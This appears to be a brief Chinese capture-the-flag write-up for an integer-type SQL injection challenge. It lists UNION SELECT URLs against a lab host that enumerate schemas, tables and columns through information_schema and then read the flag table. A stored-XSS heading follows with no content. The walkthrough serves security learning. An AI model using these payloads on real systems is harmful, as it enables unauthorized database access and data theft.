SQL注入-INT

输入1,点击search,出现sql语句
image.png
通过order by测试出有两个回显点
输入下面代码查看回显位置

http://81.70.245.6:50282/?id=-1 UNION SELECT 1,2

image.png
输入下列代码查询数据库名称

http://81.70.245.6:50282/?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata

image.png
输入下列代码查询表名

http://81.70.245.6:50282/?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema=’sqli’

image.png
输入下列代码查询列名

http://81.70.245.6:50282/?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=’flag’

image.png
输入下列代码查询出flag值

http://81.70.245.6:50282/?id=-1 UNION SELECT 1,flag from flag

image.png

XSS-存储型

image.png